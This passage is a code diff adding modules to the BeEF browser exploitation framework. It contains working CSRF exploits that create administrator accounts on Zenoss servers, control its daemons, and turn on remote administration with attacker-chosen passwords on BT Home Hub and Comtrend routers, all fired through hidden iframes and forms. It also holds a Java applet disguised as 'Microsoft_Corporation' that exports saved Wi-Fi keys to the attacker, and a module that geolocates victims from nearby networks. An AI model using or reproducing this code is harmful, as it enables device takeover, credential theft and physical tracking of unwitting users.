+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        zenoss_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss Add User CSRF"
+            description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/zenoss_add_user_csrf/module.rb

@@ -0,0 +1,46 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Zenoss_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'user_level',
+				'type' => 'combobox',
+				'ui_label' => 'User Level',
+				'store_type' => 'arraystore',
+				'store_fields' => ['user_level'],
+				'store_data' => [
+					['Manager'],
+					['ZenManager'],
+					['ZenUser']
+				],
+				'emptyText' => 'Select a user level ("Manager" is highest)',
+				'valueField' => 'user_level',
+				'displayField' => 'user_level',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/zenoss_daemon_csrf/command.js

@@ -0,0 +1,32 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>'; 
+  var service = '<%= @service %>';
+  var action = '<%= @action %>';
+
+  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
+  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(zenoss_daemon_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/zenoss_daemon_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        zenoss_daemon_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss Daemon CSRF"
+            description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/zenoss_daemon_csrf/module.rb

@@ -0,0 +1,70 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Zenoss_daemon_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
+			{ 'name' => 'service',
+				'type' => 'combobox',
+				'ui_label' => 'Daemon',
+				'store_type' => 'arraystore',
+				'store_fields' => ['service', 'description'],
+				'store_data' => [
+					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
+					['zopectl', 'zopectl (The Zope open source web application server)'],
+					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
+					['zenjobs', 'zenjobs (Zenjobs)'],
+					['zenping', 'zenping (ICMP ping status monitoring)'],
+					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
+					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
+					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
+					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
+					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
+					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
+					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
+					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
+					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
+					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
+					['zenjmx', 'zenjmx (ZenJMX)']
+				],
+				'emptyText' => 'Select a daemon',
+				'valueField' => 'service',
+				'displayField' => 'service', #'description',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+			{ 'name' => 'action',
+				'type' => 'combobox',
+				'ui_label' => 'Action',
+				'store_type' => 'arraystore',
+				'store_fields' => ['action'],
+				'store_data' => [
+					['Start'],['Stop'],['Restart']
+				],
+				'valueField' => 'action',
+				'displayField' => 'action',
+				'mode' => 'local',
+				'autoWidth' => true
+			}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/host/get_physical_location/command.js

@@ -18,11 +18,11 @@ beef.execute(function() {
     var applet_id = '<%= @applet_id %>';
     var applet_name = '<%= @applet_name %>';
     var output;
-    beef.dom.attachApplet(applet_id, 'getGPSLocation', 'getGPSLocation' ,
+    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
        	null, applet_archive, null);
-    output = document.getGPSLocation.getInfo();
+    output = document.Microsoft_Corporation.getInfo();
     if (output) {
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output.replace(/\n/g,"<br>"));
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
     }
     beef.dom.detachApplet('getGPSLocation');
 });

modules/host/get_physical_location/getGPSLocation.java

@@ -23,10 +23,8 @@ public class getGPSLocation extends Applet{
 
 	public void init() {
 		if (isWindows()) {
-			//System.out.println("This is Windows Machine");
 			result=getWindows();
 		} else if (isMac()) {
-			//System.out.println("This is Mac Machine");
 			result=getMac();
 		} else {
 			//System.out.println("Your OS is not support!!");
@@ -34,7 +32,6 @@ public class getGPSLocation extends Applet{
 	}
 	
 	public static String getWindows(){
-			String result = null;
             try {  
 			
 		ArrayList ssidList = new ArrayList();
@@ -76,7 +73,6 @@ public class getGPSLocation extends Applet{
 
 		int arraySize=ssidList.size();
 		if(arraySize==0){
-			//System.out.println("I don't know where the target is");
 			result="\nI don't know where the target is";
 		}
 		else{
@@ -89,9 +85,9 @@ public class getGPSLocation extends Applet{
 	}
 	
 	public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
+	    String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
 	    try {  
 			int j=0;
-			String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
 			while(j<ssidList.size()){
 				queryString+="&wifi=mac:";
 				queryString+=bssidList.get(j);
@@ -104,74 +100,14 @@ public class getGPSLocation extends Applet{
 				queryString+="ss:";
 				queryString+=rssiList.get(j);
 				j++;
-			}
-					
-			//Get geocoordinates / Longitude and Latitude
-			String geoCoordinates = null;		
-
-			URL url = new URL(queryString);
-			URLConnection urlc = url.openConnection();
-			urlc.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
-			BufferedReader reader = new BufferedReader(new InputStreamReader(urlc.getInputStream()));		
-			for (String output; (output = reader.readLine()) != null;) {
-				//System.out.println(output);
-				if(output.indexOf("18000.0")>0){
-					result+="\nLocation is not accurate\n";
-					//System.out.println("Location is not accurate\n");
-				}
-				else{	
-					if(output.indexOf("lat")>0){
-						output = output.replace("\"lat\" : ","");
-						output = output.replaceAll("^\\s+", "");
-						geoCoordinates = output;
-						result+="\nLatitude: ";
-						result+=output;
-						//System.out.println("Latitude: "+output);
-					}
-					if(output.indexOf("lng")>0){
-						output = output.replace("\"lng\" : ","");
-						output = output.replaceAll("^\\s+", "");
-						geoCoordinates += output;
-						result+="\nLongitude: ";
-						result+=output;
-						//System.out.println("Longitude: "+output);
-					}
-				}
-				
-			}
-			
-		
-			//Reverse geocoordinates to street address
-			String reverseGeo = "https://maps.googleapis.com/maps/geo?q="+geoCoordinates+"&output=json&sensor=true_or_false";
-			
-			//System.out.println(reverseGeo);
-
-				URL url1 = new URL(reverseGeo);
-				URLConnection urlc1 = url1.openConnection();
-				urlc1.setRequestProperty("User-Agent", "Mozilla 5.0 (Windows; U; "+ "Windows NT 5.1; en-US; rv:1.8.0.11) ");
-			BufferedReader reader1 = new BufferedReader(new InputStreamReader(urlc1.getInputStream()));		
-			for (String output1; (output1 = reader1.readLine()) != null;) {
-				if(output1.indexOf("address")>0){
-					output1 = output1.replace("\"address\": ",""); 
-					output1 = output1.replace("\",",""); 
-					output1 = output1.replace("\"",""); 
-					output1 = output1.replaceAll("^\\s+", "");
-					result+="\nAddress is ";
-					result+=output1;
-					//System.out.println("Address is "+output1);
-				}
 			}		
-			String mapAddress = "http://maps.google.com/maps?q="+geoCoordinates+"+%28You+are+located+here%29&iwloc=A&hl=en";
-			result+="\n"+mapAddress;
-			//System.out.println("\n"+mapAddress);
 		} catch (Exception e) { 
 			System.out.println(e.getMessage());
 		}
-		return result;		
+		return queryString;		
 	}
 	
 	public static String getMac(){
-		String result = null;	
         try {  
                 Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");  
                 BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));  
@@ -205,11 +141,9 @@ public class getGPSLocation extends Applet{
 			int arraySize=ssidList.size();
 			if(arraySize==0){
 				result="\nI don't know where the target is";
-				//System.out.println("I don't know where the target is");
 			}
 			else{
 				result=googleLookup(bssidList,ssidList,rssiList);
-
 			}
 		} catch (Exception e) { 
 			System.out.println(e.getMessage());

modules/host/get_physical_location/module.rb

@@ -13,14 +13,37 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
+require 'rubygems'
+require 'json'
+require 'open-uri'
+
 class Get_physical_location < BeEF::Core::Command
+
   def pre_send
     BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
   end
 
-  def post_execute
-    save({'result' => @datastore['location_info']})
+  def post_execute        
+    results = @datastore['results'].to_s
+    results = results.gsub("location_info=","")
+
+    response = open(results).read
+    result = JSON.parse(response)
+    reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
+    googleResults = open(reverseGoogleUrl).read
+    jsonGoogleResults = JSON.parse(googleResults)
+
+    addressFound = jsonGoogleResults['Placemark'][0]['address']
+
+    writeToResults = Hash.new
+    writeToResults['data'] = addressFound
+    BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
+
+    content = {}
+    content['Result'] = addressFound
+    save content
   end
-  
+
 end
 

modules/host/get_wireless_keys/command.js

@@ -0,0 +1,30 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
+    var applet_id = '<%= @applet_id %>';
+    var applet_name = '<%= @applet_name %>';
+    var output;
+    beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' ,
+       	null, applet_archive, null);
+    output = document.Microsoft_Corporation.getInfo();
+    if (output) {
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output);
+    }
+    beef.dom.detachApplet('wirelessZeroConfig');
+});
+
+

modules/host/get_wireless_keys/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        get_wireless_keys:
+            enable: true
+            category: "Host"
+            name: "Get Wireless Keys"
+            description: "This module will retrieve the wireless profiles from the target computer.<br/><br/>You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command:<br/>netsh wlan add profile filename=\"exported_wlan_profiles.xml\".<br/><br/>After that, just launch and connect to the wireless network without any password prompt.<br/><br/>For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
+            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            target:
+                user_notify: ["IE", "C", "S", "O", "FF"]

modules/host/get_wireless_keys/module.rb

@@ -0,0 +1,35 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_wireless_keys < BeEF::Core::Command
+  
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar')
+	end
+  
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result'].to_s
+		save content
+		f = File.open("exported_wlan_profiles.xml","w+")
+		f.write((@datastore['results']).sub("result=",""))
+  		writeToResults = Hash.new
+   		writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine"
+		BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar')
+	end
+  
+end
+

modules/host/get_wireless_keys/wirelessZeroConfig.java

@@ -0,0 +1,117 @@
+import java.io.*;  
+import java.util.*;
+import java.net.*;
+import java.applet.*;
+
+// Keith Lee
+// Twitter: @keith55
+// http://milo2012.wordpress.com
+// keith.lee2012[at]gmail.com
+
+public class wirelessZeroConfig extends Applet{  
+	public static String result = "";
+		
+	public wirelessZeroConfig(){
+		super();
+		return;
+	}
+	public static String getInfo() {
+		return result;
+	}
+
+	public void init() {
+		if (isWindows()) {
+			String osVersion= System.getProperty("os.version");
+			if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+				result=getWindows();
+			}
+		} else {
+			result = "OS is not supported";
+		}
+	}
+	
+	public static String getWindows(){
+		String cmd1 = "netsh wlan show profiles";
+		String cmd2 = "netsh wlan export profile name=";
+		String keyword1 = "User profiles";
+	 	String wlanProfileArr[];
+		String wlanProfileName;
+		int match = 0;
+		int count = 0;
+		ArrayList<String> profileList = new ArrayList<String>();
+		try {  
+			//Get wlan profile names
+			Process p1 = Runtime.getRuntime().exec(cmd1);  
+			BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));  
+			String line = null;  
+        		//Checks if string match "User profiles"
+			while ((line = in1.readLine()) != null) {
+				//Checks if string match "User profiles"
+				if(match==0){
+					if(line.toLowerCase().contains(keyword1.toLowerCase())){
+						match=1;
+					}
+				}	
+				if(match==1){
+					if(count>1){
+						//If string matches the keyword "User Profiles"
+						line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
+						if(line.length()>0){
+							wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
+							profileList.add(wlanProfileName);
+						}
+					}
+					count+=1;
+				}
+			}
+			in1.close();	
+	    	} catch (IOException e) { }
+		
+		try{	
+    			String tmpDir = System.getProperty("java.io.tmpdir");
+			if ( !(tmpDir.endsWith("/") || tmpDir.endsWith("\\")) )
+   				tmpDir = tmpDir + System.getProperty("file.separator");
+
+			//Export WLAN Profile to XML file
+			for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
+				String profileName = iterator.next().toString();
+				Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');  
+				//Check if exported xml exists
+				File f = new File(tmpDir+"Wireless Network Connection-"+profileName+".xml");
+				if(f.exists()){	
+					//Read contents of XML file into results variable
+					FileInputStream fstream = new FileInputStream(f);
+					DataInputStream in2 = new DataInputStream(fstream);
+					BufferedReader br = new BufferedReader(new InputStreamReader(in2));
+					String xmlToStr;
+					while((xmlToStr = br.readLine()) != null){			
+						result+=xmlToStr;
+					}
+					in2.close();				
+				}
+			}
+	    } catch (IOException e) {  
+        }
+		return result;   
+	}
+
+	public static boolean isWindows() {
+		String os = System.getProperty("os.name").toLowerCase();
+		return (os.indexOf("win") >= 0);
+	}
+	
+	/**
+	public static void main(String[] args) {
+		if (isWindows()) {
+			String osVersion= System.getProperty("os.version");
+			System.out.println(osVersion);
+			if(osVersion.equals("6.0") || osVersion.equals("6.1")){
+				result=getWindows();
+			}
+		} else {
+			result = "OS is not supported";
+		}
+		System.out.println(result);
+	}
+	**/
+}  

modules/misc/local_file_theft/config.yaml

@@ -8,7 +8,7 @@ beef:
             enable: true
             category: "Misc"
             name: "Local File Theft"
-            description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme, this module checks common locations and cheekily snaches anything it finds. Shameless plagurised from kos.io/xsspwn. To test this module save the beefhook page locally and open in safari from the your localfile system"
+            description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
             authors: ["mh"]
             target:
                 working: ["All"]

modules/router/bt_home_hub_csrf/command.js

@@ -0,0 +1,58 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var bt_home_hub_iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5");
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', '0');
+  input.setAttribute('value', '31');
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', '1');
+  input.setAttribute('value', '');
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', '30');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  bt_home_hub_iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    delete form;
+    document.body.removeChild(bt_home_hub_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/router/bt_home_hub_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        bt_home_hub_csrf:
+            enable: true
+            category: "Router"
+            name: "BT Home Hub CSRF"
+            description: "Attempts to enable remote administration and change the tech password on a BT Home Hub wireless router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/router/bt_home_hub_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Bt_home_hub_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/router/comtrend_ct5367_csrf/command.js

@@ -0,0 +1,61 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
+  ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+
+  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', gateway + "/password.cgi");
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'sptPassword');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'usrPassword');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'sysPassword');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(ct5367_iframe1);
+    document.body.removeChild(ct5367_iframe2);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/router/comtrend_ct5367_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        comtrend_ct5367_csrf:
+            enable: true
+            category: "Router"
+            name: "Comtrend CT-5367 CSRF"
+            description: "Attempts to enable remote administration and change the password on a Comtrend CT-5367 router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/router/comtrend_ct5367_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Comtrend_ct5367_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/router/comtrend_ct5624_csrf/command.js

@@ -0,0 +1,35 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
+  ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+
+  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(ct5367_iframe1);
+    document.body.removeChild(ct5367_iframe2);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/router/comtrend_ct5624_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        comtrend_ct5624_csrf:
+            enable: true
+            category: "Router"
+            name: "Comtrend CT-5624 CSRF"
+            description: "Attempts to enable remote administration and change the password on a Comtrend CT-5624 router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/router/comtrend_ct5624_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
